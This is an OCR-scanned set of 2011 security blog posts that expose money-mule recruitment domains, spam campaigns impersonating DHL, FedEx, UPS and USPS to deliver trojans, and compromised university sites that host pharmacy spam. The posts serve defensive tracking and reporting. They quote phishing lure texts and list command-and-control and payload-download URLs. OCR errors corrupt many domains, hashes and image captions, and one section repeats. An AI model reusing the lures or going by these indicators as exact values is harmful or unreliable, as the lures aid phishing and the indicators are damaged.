DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 

DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale- 
antcorp.biz 

FINTEC-UKLTD. WS 

fintec-ukltd. ws 

fourthgroup-ltd.cc - Email: rots@cheapbox.ru 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

generation-groupltd.cc - Email: jz@ppmail.ru 

l-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 

ka temdutkins. co. cc 

ULAC-GROUPLLC.CC - Email: lane@free-id.ru 

LILACGROUP-LLC.CO - Email: baggy@bz3.ru 

MIMOSA-INCGROUP.INFO - Email: admin@mimosa- 
incgroup.info 

moneyvisual-ukllc.com - Email: admin@moneyvisual- 
ukllc. com 

nimrodltd-uk.net - Email: admin@nimroditd-uk.net 
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@gead-groupllc.net 



RENAISSANCELLC. BE 
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aimicgrouP'llc.co 



renaissancellc. be 

renaissance-llc.cc - Email: admin@renaissance-llc.cc 

ROYALTHELMAS-GROUP-LLC.CC Email: zap@ca4.ru 

ROYALTHELMAS-TEAMANT.ASIA Email: 
admin@royalthelmas-teamant.asia 

SCHWARTZBROTHERSANT-CORP.COM - Email: 
admin@sch wartzbrothersant-corp. com 

STRATEGICGROUP-LLC.CO - Email: fiute@free-id.ru 

THRONE-GROUPLLC.CC - Email: lane@free-id.ru 



THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 

THRONE-UK.AT - Email: admin@throne-uk.at 

TINASSANSERVICEANT-ANTTEAM.NET Email: 
admin@tinassanserviceant-antteam.net 

TINASSANSERVICE-GROUPLLC.CC - Email: six@yourisp.ru 

westerntrust. co. uk 

westview-art.net - Email: admin@westview-art.net 
[ 10 ] 

Domains responding to: 

78.46.105.205 - AS24940, HETZNER-AS Hetzner Online AG 
RZ 

98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC. 

98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC. 

114.207.244.143 -AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.145 -AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

193.105.134.230 - AS42708, PORTLANE Network 

193.105.134.231 - AS42708, PORTLANE Network 
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Latest projects 


193.105.134.232 - AS42708, PORTLANE Network 

193.105.134.233 - A542708, PORTLANE Network 

193.105.134.234 - AS42708, PORTLANE Network 

195.182.57.84 - AS47311, Cerannics-AS Cerarmics lip 

195.182.57.91 - AS47311, Cerannics-AS Cerannics lip 

204.45.118.54 - 204.45.118.48/29/INSIGHT-INVESTMENTS- 
LLC 







More malicious activity within [11JAS24940, HETZNER-AS 
Hetzner Online AC RZ, courtesy of the SpyEye tracker: 

188.40.198.185 

188.40.87.88 
www. priva thosting.eu 
spl.priva thosting. eu 
46.4.194.162 
188.40.87.91 
88.198.36.61 
[ 12 ] 

Name servers of notice: 

nsl.uknamo.com - 69.10.44.188 - Email: morph@ppmaii.ru 
ns2.uknamo.com - 178.162.181.11 
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ns3.uknamo.com - 66.199.236.116 

nsl.ukansnami.com -178.162.181.11 - Email: 
glide@yourisp. ru 

ns2.ukansnami.com - 178.162.181.11 

ns3.ukansnami.com - 66.199.236.117 

ns3.dnsukrect.com - 66.199.236.118 - Email: 
code@yourisp. ru 



NS1.LIBUNITAU.CC - 178.162.152.76 - Email: 
ached@yourisp.ru - [13]seen here 

NS2.LIBUNITAU.ee - 66.199.236.115 

NS3.LIBUNITAU.ee - 178.162.181.11 

NSl.AUSTDEC.CC - 178.162.152.75 - Email: 
bold@yourisp.ru - [14]seen here 

NS2.AUSTDEC.CC - 66.199.236.114 

NS3.AUSTDEC.CC - 178.162.181.11 

NSl.SURPLUSUSA.CC - 209.159.156.162 - Email: 
skulk@ppmail.ru - [15]seen here 

NS2.SURPLUSUSA.CC - 76.73.47.26 

NS3.SURPLUSUSA.CC - 69.50.192.97 

NSl.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen 
here 

NS2. USABONDS. CC 
NS3. USABONDS. CC 

The cybercriminals have also switched from using unique 
emails for registrations to default admin@money- 

mule-recruitment domain type of structure. Monitoring of 
their money mule recruitment activities is ongoing. 

Related posts: 

[17]Keeping Money Mule Recruiters on a Short Leash - Part 
Five 



[18] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[19] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[20] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[21 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[22[Money Mule Recruiters on Yahoo! 's Web Hosting 

[23] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[24] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[25] Keeping Reshipping Mule Recruiters on a Short Leash 

[26] Keeping Money Mule Recruiters on a Short Leash 

[27] Standardizing the Money Mule Recruitment Process 

[28] Inside a Money Laundering Group's Spamming 
Operations 

[29] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[30] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [31]Dancho 
Danchev's blog. 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Six (2011-03-10 14:45) 

[ 1 ] 

Following my previous post on "[2]Keeping Money Mule 
Recruiters on a Short Leash - Part Five", in this post 
we're once again going to expose a portfolio of money mule 
recruitment domains, their related ASs and name servers of 

notice, including some additional Spy Eye activity within one 
of the ASs. 

What's particularly interesting is the ongoing use of similar 
templates, including fake "certified by" documents aiming to 









boost the visitor's confidence in the mule recruitment 
company. Sample "certified by" documents include: 685 




Selling IBM cxrvcr xScrics 
infatsinKiutc Solution* 

twoimuiM 

Hnvatch Investments Inc. 













s 


Most Promising 
New Bus ness 


Hiwatch Investments Inc. 


In|h «l DM MiaM* ft Ww (m 
W> »«i > 0 Ct«wn» ft mftoirt 


Highly Commended 
ixO 


BT^ 


[3] 

[4] 

[5] 

[ 6 ] 
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[ 7 ] 

Money mule recruitment web sites: 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - 

[8] seen here 













ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 

ARAMATEGROUP-INT.INFO - Email: admin@aramategroup- 
int.info 

art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at 

ARTSOLVELTD.CC - Email: admin@artsolveltd.ee 

artsolveltd.ee - Email: admin@artsolveltd.ee 

ARTSOLVELTDCO.AT - Email: admin@artsolveltd.ee 

artsolveltdco.at - Email: admin@artsolveltd.ee 

ASTECH-CROUPDE.CC - Email: admin@i-compass-group.cc 

atlant-groupine.ee - Email: bombay@yourisp.ru - [9]seen 
here 

Atlant-usainc.net - Email: admin@atlant-usainc.net 

BREDCARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence- 
groupllc.at 

CREATENCE-CROUPLLC.CC - Email: hunt@bz3.ru 

CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale- 
antcorp.at 



DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale- 
antcorp.biz 

DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 

DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale- 
antcorp.biz 

FINTEC-UKLTD. WS 

fintec-ukltd. ws 

fourthgroup-ltd.cc - Email: rots@cheapbox.ru 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

generation-groupltd.cc - Email: jz@ppmail.ru 

l-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 

ka temdutkins. co. cc 

ULAC-GROUPLLC.CC - Email: lane@free-id.ru 

LILACGROUP-LLC.CO - Email: baggy@bz3.ru 

MIMOSA-INCGROUP.INFO - Email: admin@mimosa- 
incgroup.info 

moneyvisual-ukllc.com - Email: admin@moneyvisual- 
ukllc. com 

nimrodltd-uk.net - Email: admin@nimroditd-uk.net 
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@gead-groupllc.net 



RENAISSANCELLC. BE 
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aimicgrouP'llc.co 



renaissancellc. be 

renaissance-llc.cc - Email: admin@renaissance-llc.cc 

ROYALTHELMAS-GROUP-LLC.CC Email: zap@ca4.ru 

ROYALTHELMAS-TEAMANT.ASIA Email: 
admin@royalthelmas-teamant.asia 

SCHWARTZBROTHERSANT-CORP.COM - Email: 
admin@sch wartzbrothersant-corp. com 

STRATEGICGROUP-LLC.CO - Email: fiute@free-id.ru 

THRONE-GROUPLLC.CC - Email: lane@free-id.ru 



THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 

THRONE-UK.AT - Email: admin@throne-uk.at 

TINASSANSERVICEANT-ANTTEAM.NET Email: 
admin@tinassanserviceant-antteam.net 

TINASSANSERVICE-GROUPLLC.CC - Email: six@yourisp.ru 

westerntrust. co. uk 

westview-art.net - Email: admin@westview-art.net 
[ 10 ] 

Domains responding to: 

78 . 46 . 105.205 - AS24940, HETZNER-AS Hetzner Online AG 
RZ 

98 . 141 . 220.116 - AS29713, INTERPLEXINC Interplex LLC. 

98 . 141 . 220.117 - AS29713, INTERPLEXINC Interplex LLC. 

114 . 207 . 244.143 -AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114 . 207 . 244.144 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114 . 207 . 244.145 -AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114 . 207 . 244.146 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

193 . 105 . 134.230 - AS42708, PORTLANE Network 

193 . 105 . 134.231 - AS42708, PORTLANE Network 
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Latest projects 


193 . 105 . 134.232 - AS42708, PORTLANE Network 

193 . 105 . 134.233 - A542708, PORTLANE Network 

193 . 105 . 134.234 - AS42708, PORTLANE Network 

195 . 182 . 57.84 - AS47311, Cerannics-AS Cerarmics lip 

195 . 182 . 57.91 - AS47311, Cerannics-AS Cerannics lip 

204 . 45 . 118.54 - 204.45.118.48/29/INSIGHT-INVESTMENTS- 
LLC 







More malicious activity within [11JAS24940, HETZNER-AS 
Hetzner Online AC RZ, courtesy of the SpyEye tracker: 

188.40.198.185 

188.40.87.88 
www. priva thosting.eu 
spl.priva thosting. eu 
46.4.194.162 
188.40.87.91 
88.198.36.61 
[ 12 ] 

Name servers of notice: 

nsl.uknamo.com - 69.10.44.188 - Email: morph@ppmaii.ru 

ns2.uknamo.com - 178.162.181.11 
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ns3.uknamo.com - 66.199.236.116 

nsl.ukansnami.com -178.162.181.11 - Email: 
glide@yourisp. ru 

ns2.ukansnami.com - 178.162.181.11 

ns3.ukansnami.com - 66.199.236.117 

ns3.dnsukrect.com - 66.199.236.118 - Email: 
code@yourisp. ru 



NS1.LIBUNITAU.CC - 178.162.152.76 - Email: 
ached@yourisp.ru - [13]seen here 

NS2.LIBUNITAU.ee - 66.199.236.115 

NS3.LIBUNITAU.ee - 178.162.181.11 

NSl.AUSTDEC.CC - 178.162.152.75 - Email: 
bold@yourisp.ru - [14]seen here 

NS2.AUSTDEC.CC - 66.199.236.114 

NS3.AUSTDEC.CC - 178.162.181.11 

NSl.SURPLUSUSA.CC - 209.159.156.162 - Email: 
skulk@ppmail.ru - [15]seen here 

NS2.SURPLUSUSA.CC - 76.73.47.26 

NS3.SURPLUSUSA.CC - 69.50.192.97 

NSl.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen 
here 

NS2. USABONDS. CC 
NS3. USABONDS. CC 

The cybercriminals have also switched from using unique 
emails for registrations to default admin@money- 

mule-recruitment domain type of structure. Monitoring of 
their money mule recruitment activities is ongoing. 

Related posts: 

[17]Keeping Money Mule Recruiters on a Short Leash - Part 
Five 



[18] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[19] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[20] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[21 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[22] Money Mule Recruiters on Yahoo! 's Web Hosting 

[23] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[24] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[25] Keeping Reshipping Mule Recruiters on a Short Leash 

[26] Keeping Money Mule Recruiters on a Short Leash 

[27] Standardizing the Money Mule Recruitment Process 

[28] Inside a Money Laundering Group's Spamming 
Operations 

[29] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[30] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [31]Dancho 
Danchev's blog. 
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Spamvertised DHL Notification Malware Campaign 
(2011-03-10 15:29) 

[11 

A currently spamvertised malware campaign is brand-jacking 
DHL for malware-serving purposes. 

Sample filename: document.zip => DHL _notification.exe 

Sample message: Dear customer. The parcel was send 
your home address. And it will arrice within 7 bussness day. 

More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 

GmbH. All rights reserverd - notice the typo. 

DHL _notification.exe - [2]Trojan-Spy.Win32. Spy Eyes - 
Result: 27/43 (62.8 %) 

MD5 : bda 72e5 7d263241d52bl fe2ef014cba9 

SHA1 : fa9dcl 4b 100fl bf5124cd23c322cl 09b38a 70675 

SHA256: 

199 f235 7c24e71 d955a4e6c2d07645aa04d94 74e0c8c914a 1 
edd69a02e3f8a 70 


Upon execution phones back to: 





adobe, com/geo/productid.php 

elsoplongt.com/rk',jopbh/qwq - Email: 
redaccion@elsoplongt. com 

accuratefiles. com/rk', jopbh/qwq 

lulango.com/rk'Jopbh/qwq - Email: iuiango@gmaii.com 

erherg34gsafwe.com/xgate.php - A549469, Email: 
admin@erherg34gsafwe. com 

- erherg34gsafwe. com/ftp/base, bin 

- erherg34gsafwe. com/ftp/ftpplug2. dii 

- erherg34gsafwe. com/ftp/base, bin 

Domains responding to: 

192.150.16.117 

72.41.115.170 

74.117.180.216 

87.106.193.21 

94.63.244.56 

This post has been reproduced from [3]Dane ho 
Danchev's blog. 

1. httos://lh5. aooaleusercontent. com/- 

tTD9sG3CmGk/TXiNs W5Pb4l/AAAAAAAA E2 Y/Ho e vhi O WhBo/s 
1600/dhl. ipa 


2 . 








htto: //www. virustotal. com/file-scan/report.html? 
id=199f2357c24e71 d955a4e6c2d07645aa04d94 74e0c8c91 


4aledd69 

a02e3f8a 70-1299762101 

3. http://ddar>chev. b lo gs pot, com/ 
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Compromised University Leads to Fraudulent 
Pharmaceutical Ads (2011-03-10 16:53) 

[ 1 ] 

Continuing the [2]Compromised University Leads to 
Fraudulent Google Brand-jacked Pharmaceutical Ads 
















series, yet another university has been compromised by 
pharmaceutical scammers, [3]part of an affiliate network. 

In this very latest example of this tactic, seeking to abuse 
the high pagerank of the web site in question, the 

web site of the Department of Mathematics at Rutgers 
University (math.rutgers.edu/mdnews/) appears to have 
been compromised by pharmaceutical scammers. 

Included URLs: 

ma th.rutgers. edu/mdne ws/le vitraline, html 
ma th.rutgers. edu/mdne ws/le vitrastory.html 
ma th.rutgers. edu/mdne ws/cialis-pills. html 
ma th.rutgers. edu/mdne ws/le vitradosage. html 
ma th.rutgers. edu/mdne ws/viagra-buy-online.html 
[4] 
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e 


O E 


Today's Bestsellers: 

Viagra Cialis 


H0 


Levitra 


Redirects to: 

worldselectshop.com/?id=abamos - 95.211.1.82 - Email: 
worldselectshop. com@protecteddomainservices. com 

The same affiliate ID is also active at: 

usadrugstoreno w. com/products/dif1ucan.htm ? 
id=abamos 


212.117.185.19 


Email: 

usadrugstorenow. com@protecteddomainservices. com 

This post has been reproduced from [5]Dane ho 
Danchev's blog. 

















1. httos://lh3. aooaleusercontent. com/- 

Oi3 adZIWv Y/TXiiiPGuaal/AAAAAAAAE2c/YGMoA81 Wa7s/sl 60 
O/Rutaersmathemati 

cspharmaceuticaiads.PNG 

2. http://ddanchev.blo as pot.com/2011/03/compromised- 
uni versitv-leads-to.html 

3. http://www.zdnet.com/bloa/securitv/inside-an-affiliate- 
S Dam-Droaram-for-Dharmaceuticals/2054 

4. httos://lh5. aooaleusercontent. com/- 

klV upiBXel/TX i inkMGkAl/AAAAAAAAE2 a/h aO mHxcrcs/sl600 
/Rutaers mathemati 

cs pharmaceutical ads 02. PNG 

5. htto.Y/ddanchev. blo as oot. com/ 
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More Spamvertised DHL Notifications Spread Malware 
(2011-03-11 15:31) 

[ 1 ] 

Yesterday's campaign is still ongoing, with new MD5's in the 
wild. Here are the details. 


Sample subjects: DHL notification #random number 





































Sample message: Dear customer! The parcel was send 
your home address. And it will arrice within 7 bussness day. 

More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 

GmbH. AH rights reserverd. 

Sample filenames: DHL_tracking.zip; doc.zip 

doc.exe - [2]Trojan-Spy.SpyEy!IK - Result: 18/ 43 (41.9 %) 

MD5: 83db662187dd7cd58fc4a368ea2 7775d 

SHA1 : 4edb2d95c0570a36f6cb992e55111 cdd7c3eda69 

5HA256: 

99fl e003bbfl 025b0bbe257ece65dl 704852fdl ba48e6cc79b 
d39cde6e6d!4c3 

DHL _ tracking, exe - [3]Win-Trojan/Spyeyes.45568 - 

Result: 29/43 (67.4 %) 

MD5 : 81 fc09b014617bce59f678374b486512 

SHA1 : 3d92a 768f58b2900b98c9f9 7ce2 753d2 7a4 749ae 

SHA256: 

24b23bf7ebd03bf5feb0c637eale64661e27c78c66684dd49f 

074af2b2505bb7 

Upon execution phones back to: 

adobe, com/geo/productid.php 

elsoplongt.com/rk'Jopbh/qwq - Email: 
redaccion@elsoplongt. com 



accuratefiles. com/rk', jopbh/qwq 

lulango.com/rk'Jopbh/qwq - Email: lulango@gmail.com 

erherg34gsafwe.com/xgate.php - AS49469, Email: 
admin@erherg34gsafwe. com 

- erherg34gsafwe. com/ftp/base, bin 

- erherg34gsafwe. com/ftp/ftpplug2. dll 

- erherg34gsafwe. com/ftp/base, bin 

Domains responding to: 

192.150.16.117 

72.41.115.170 

74.117.180.216 

87.106.193.21 

94.63.244.56 

Additional malicious activity within AS49469 (SA-NOVA- 
TELECOM-GRUP-SRL 5a Nova Telecom Grup SRL, cour¬ 
tesy of the [4]ZeusTracker and the [5]SpyEye Tracker: 
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bigupdate.ru - Email: admin@hotupdaters.ru 
bigupdatings.ru - Email: admin@bigupdatings.ru 
bigupdater.ru - Email: admin@bigupdater.ru 
bigupdates.ru - Email: admin@istuplenie.ru 



bigupdating.ru - Email: admin@bigupdating.ru 
bigupdaters.ru - Email: admin@bigupdaters.ru 
94.63.244.30 

metamphcrystal.com - Email: 
admin@metamphcrystal. com 

Related malware-serving domains within AS49469, SA-NOVA- 
TELECOM-GRUP-SRL 5a Nova Telecom Grup SRL 

xppclapgirl.com - 89.114.9.33 

natnatraoi.com - 12.211.117.127 - Email: 
barbarasorber@yahoo. com 

d34ghqarfrgad.com - 94.63.244.56 - Email: 
admin@d34ghqarfrgad. com 

g3u4g.net - 89.114.9.33 - Email: 
G3U4G.NET@domainservice.com 

suhi4hr.net - 89.114.9.60 - Email: 

SUHI4HR. NET@domainservice. com 

mialedot.ru - 94.63.244.44 - Email: abuse@mialedot.ru 

biackmemoso.com - Email: grasp@yourisp.ru 

This post has been reproduced from [6]Dane ho 
Danchev's blog. 

1. httos://lh6. aooaleusercontent. com/- 
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htto: //www. virustotal. com/file-scan/report.html? 
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de6e6dl 4c3-129984 7160MD5%20%20%20 

3 . 

http://www. virustotal. com/file-scan/report, html? 
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49 f074a 
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4. https://zeustracker.abuse, ch/monitor. oh o?as=49469 

5. httos://s ove vetracker.abuse, ch/monitor. oho? 
as=49469&filter=online 

6. htto://ddanchev. blo as oot. com/ 
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Spamvertised FedEx Notifications Spread Malware 
(2011-03-16 18:14) 


[ 1 ] 



















A currently ongoing spamvertised campaign is brand-jacking 
FedEx for malware serving purposes. 

Sample attachments: FedEx letter.zip; FedEx ietter.exe 

Sample subject: FedEx notification #random number 

Sample message: Dear customer. The parcel was sent your 
home address. And it will arrive within 7 business day. 

More information and the tracking number are attached in 
document below. 

Thank you. 

© FedEx 1995-2011 

Detection rate: FedEx Ietter.exe - [2]Trojan.FakeAV - 

Result: 24/43 (55.8 %) 

MD5 : 90bef5dff5809682249813fd63b67da4 

SHA1 : 2418c01a30al9a2d76b693474a852092e3de4a32 

5HA256: 

a38848786528d235b51 fed3adf20050f5cl 906d066e0282311 
b8bce37d8163a0 

Phones back to AS30890 (EVOLVA Evolva Telecom s.r.l.) 

94.63.244.56/lol2. exe 
94.63.244.56/pod. exe 

with 94.63.244.567allftp.txt; 94.63.244.56/ftp/db 
_grab.txt hosting the sniffed FTP credentials. 



Responding to 94.63.244.56 are d34ghqarfrgad.com and 
erherg34gsafwe.com , phone back URLs which we've seen 
from last week's spamvertised DHL Notifications campaigns, 
with the use of the IP best described as a desperate attempt 
to maintain a C &C infrastructure: 

• [3]5pamvertised DHL Notification Malware Campaign 

• [4]More Spamvertised DHL Notifications Spread Malware 

This post has been reproduced from [5]Dancho 
Danchev's blog. 

1. https://ih4. aooaleusercontent. com/-Yeka44oRoOA/TYDQ4- 
a8aOI/AAAAAAAAE2o/eti6lsnhs4Q/sl 600/fedex-lo ao. ioea 

2 . 

htto://www. virustotal. com/file-scan/reoort. html? 
id=a38848786528d235b51 fed3adf20050f5cl 906d066e0282 

311b8bc 
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e3 7d8163a 0-1300286639 

3. http.V/ddanchev.blo as pot.com/2011/03/spamvertised-dhl - 
notificication-malware.html 

4. http.V/ddanchev.blo as oot.com/2011/03/more- 
s pam vertised-dhl-notifications. html 

5. http.V/ddanchev.blo as pot.com/ 
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Compromised Universities Leads to Fraudulent 
Pharmaceutical Ads (2011-03-16 19:30) 

[ 1 ] 

Continuing the "[2]Compromised University Leads to 
Fraudulent Pharmaceutical Ads"[3]Compromised 
University Leads to Fraudulent Google Brand-jacked 
Pharmaceutical Ads" series, in this post we'll discuss two 
more compromised web servers of educational institutions 
leading to pharmaceutical ads. Affected Universities are: 


Rutgets Energy Institute: 










ruei. rutgers.edu/docu ments/chin. php?adv=cialis20- 
mg 

ruei. rutgers. edu/documents/chin.php ?adv= viagra- 
ratings 

ruei. rutgers.edu/documents/chin.php?adv=viagra-999 

ruei. rutgers. edu/documents/chin.php ?adv= viagra- 
expired 

ruei. rutgers. edu/documents/chin.php ?adv= viagra- 
kako-se 

Uploaded redirectors: 

ruei. rutgers. edu/documents/chin.php 
ruei. rutgers. edu/documents/roar. php 
ruei. rutgers. edu/documents/ost.php 

Computer Music Center at Columbia University 

music. Columbia, edu/cmc/pills/index.php ?adv=ho w-to- 
try- viagra 

music. Columbia, edu/cmc/pills/index.php ? 
adv=damaskviagra 
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tevtConvci 


OurMci 

trecaao PinlwKKn 
If* Drop 
Go«*roHe«art 



Johnny.34 

Despite thrt *ii my In* en- 
bM order and I hti4tf*d ter a 
I eng tone tM or# to p#y by 
citdt card though tho u« and 
get taka product n return I 
lock a nk and got nrfu* 

Stephen Smith 

When I placed an order ter my 
granddad I gare hr» addni 
and my phono and * took a be 
longer to d rlwr (ho product* 
because they phoned me and 
my granddaddy to check 
e*erythng 


Female Viagra 


music. Columbia, edu/cmc/pills/index.php ? 
adv=brandle vitra 


music. Columbia, edu/cmc/pills/index.php ? 
adv= vegetalviagra 

music. Columbia, edu/cmc/pills/index.php ?adv= vviagra 

[4] 

The sampled URLs redirect to the following fraudulent 
pharmaceutical sites: 

pillsedonline.com - 93.170.104.53 - Email: 
stavrosl929@hotmail.com; stavroscomodromos@yahoo.com 





buyperfecthealth.com - 93.170.104.53 - Email: 
sta vrosl 929@hotmail. com 

safedrugstock.com - 93.170.104.53 - Email: 
sta vrosl 929@hotmaii. com 

securedrugstock.com - 93.170.104.53 - Email: 
sta vrosl 929@hotmail. com 

europharmas.com - 93.170.104.53 - Email: 
giockner546@hotmaU. com 

requestpills.com - 93.170.104.53 - Email: 

sta vrosl 929@hotmaii. com; sta vroscomodromos@yahoo. com 

online-doc.us - 93.170.104.53 - Email: cool 
_gamer90@mail.ru 

pills4sex.eu - 93.170.104.53 

securetablets.com - 93.170.104.53 - Email: 
sta vrosl 929@hotmail. com 

alledtablets.com - 93.170.104.53 - Email: 

sta vrosl 929@hotmail. com; sta vroscomodromos@yahoo. com 

canadian-refills.com -178.239.60.214 - Email: privacy- 
82991 1 @domainprivacygroup. com 

Cybercriminals continue purchasing web shells/and stolen 
FTP credentials to high page rank-ed web sites such 

as educational institutions. Monitoring of their operations will 
continue. 
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This post has been reproduced from [5]Dancho 
Danchev's blog. 
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Spamvertised United Parcel Service notifications 
serve malware (2011-03-23 15:54) 

[ 1 ] 

A currently ongoing spam campaign is impersonating UPS for 
malware-serving purposes. 

Sample subject: United Parcel Service notification 

Sample attachments: UPSnotify.rar; UPSnotify.exe; 

Uni tedParcelServicedocum en t. exe 

Sample message: Dear customer. 

The parcel was sent your home address. And it will arrive 
within 7 business day. More information and the 




tracking number are attached in document below. Thank 
you. © 1994-2011 United Parcel Service of America, Inc. 

Detection rates: 

UnitedParcelServicedocument.exe - [2]Ma//Bredo-K - 
Result: 7/41 (17.1%) 

MD5 : b60e95b42106989bc39el 75efcc031 db 

SHA1 : 0fb63dff83db643c9ee42efe617bdd539a5ffb8f 

SHA256: 

65 fl 4438c 3154a 74 767131a427fbdc50c28a 6cbcdcf4 7f3d418 
b92c4cl68696a 

UPS notify.exe - [3]Mal/Bredo-K - Result: 17/40 (42.5 %) 

MD5 : cc040e69121bcl 9f23ef4a32dbb8a80e 

SHA1 : da65b7b277540b88918076949a28e8307ad7e41 a 

SHA256: 

ef5f76el b20c2083469fbe 7e4de4ec9c06689eel 052 74bl a 79 
c9cadbd23d54ae 

Upon execution downloads additional binaries from: 

193.105.121.33/lol2. exe 
193.105.121.33/pod. exe 
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193.105.121.337spm.exe 

Responding to 193.105.121.33 are undeardarling.com - 

Email: admin@undearhappydear.com and 



undearhappydear.com - Email: 
admin@undearhappydear. com 

Detection rates: 

lol2.exe - [4JTrojan.FakeAV!gen39- Result: 14/43 (32.6 %) 

MD5 : 74 7431 a2a4a29fl bfcl36e674af99ad0 

SHA1 : 8349fc3f5f299d0ca6473e748276ec2b50019330 

5HA256: 

6009e7f5cbc55e6acb060d9fb33a39a978168a32a0a8c6a24f 
201106056cc0db 

pod.exe - [5]Backdoor. Win32.CbotSIK - Result: 33/ 42 
(78.6 %) 

MD5 : f403afdbe4c4c859c8ab018a7ded694c 

SHA1 : 1915a46cbb43fcaf8da90af95856d7524b24fl29 

5HA256: 

eddfff99df316669191 be0b61 a5ae06ee811 bbd2 7110111e69 
cbd212881fa494 

Upon execution phones back to: 

heaithyiifenow.com - 208.109.223.193 - Email: 
HEAETHYLIFENO W. COM@domainsbyproxy, com 

bigbeerclubonline.com - Email: 
contact@privacyprotect, org 

zonetf.com - 96.9.169.85 - Email: janeob@126.com 
spm.exe - [6JW32.Pilleuz -10/42 (23.8 %) 



MD5 : de55498b9f9195fl733df62c7026cf5f 


SHA1 : 5520cl220cdd03a64f9b782c2393697ebabl54b9 
SHA256: 

dc2a797e5be968f9d36d4510988fa242c042a3e315fb50a3f9 

325cae6ald779d 

Upon execution phones back to: 

ponel.biz - 46.4.62.17 - Email: web _raskrutka@pochta.ru 

itisformebaby.biz - 46.4.10.7; 88.198.46.151; 
178.63.63.208 - Email: web _raskrutka@pochta.ru 

gmail.com 

yahoo.com 

hotmail.com 

As speculated, cybercriminals have started feeding 
legitimate sites into their C &C communication patterns in an 
attempt to undermine community efforts aimed at tracking 
their malicious activities. 

Related posts: 

[7] Spamvertised FedEx Notifications Spread Malware 

[ 8 ] Spamvertised DHL Notification Malware Campaign 

[9] More Spamvertised DHL Notifications Spread 
Malware 

This post has been reproduced from [lOJDancho 
Danchev's blog. 
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Spamvertised Post Office Express Mail (USPS) Emails 
Serving Malware (2011-03-25 18:20) 

[ 1 ] 

A currently spamvertised malware campaign is 
impersonating the USPS for malware-serving purposes. 

Sample subject: Post Express Information. Your package is 
available for pick up. NR[random number] 

Sample attachment: Post_Express_Label JD [random 
number].zip; Post_Express _Label.exe 

Sample message: 

Dear client, Email notice number.[random number]. Your 
package has been returned to the Post Express office. 

The reason of the return is "Error in the delivery address" 
Important message! Attached to the letter mailing label 
contains the details of the package delivery. You have to 
print mailing label, and come in the Post Express office in 
order to receive the packages! Thank you for using our 
services. Post Express Support. 

Detection rate: 

Post_Express _Label.exe - [2]Medium Risk Malware 
Dropper - Result: 1/41 (2.4 %) 

MD5 : 3c05dd68ee0bfb9b290b9c034f836833 

SHA1 : 8ala00da04c96c8e67b9921652de60463118ea9f 

SHA256: 

57d58165c79158a42c3e45670aa4176aaae393f371188f91d0 

ac46022bd3e7c0 



[3] 
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Post Express Service 



Details of delivery parcels 




W»«ht 

U 

34 

546 

Length 

17 

77 

66 

Quell* 

57 

6 

465 

Tutel weigh' 

333 

674 

567 

0 tried t 

743 

211 

1 

Amount 

56 

44 

53 

Tutel weigh' 

n 

86 



Source: Data for parcel; 



Upon execution phones back to: 

mialepromo. ru/7Pe80Rolxs/document. doc 
mialepromo. ru/7Pe80Rolxs/load.php ?file=0 
mialepromo. ru/7Pe80Rolxs/load.php ?fiie=l 
mialepromo. ru/7Pe80Rolxs/load.php ?fiie=2 
mialepromo. ru/7Pe80Rolxs/load.php ? file=3 











mialepromo. ru/7Pe80Rolxs/load.php ?file=4 

mialepromo. ru/7Pe80Rolxs/load.php ?file=5 

mialepromo. ru/7Pe80Rolxs/load.php ?file=6 

mialepromo. ru/7Pe80Rolxs/load.php ?file=7 

mialepromo. ru/7Pe80Rolxs/load.php ?file=8 

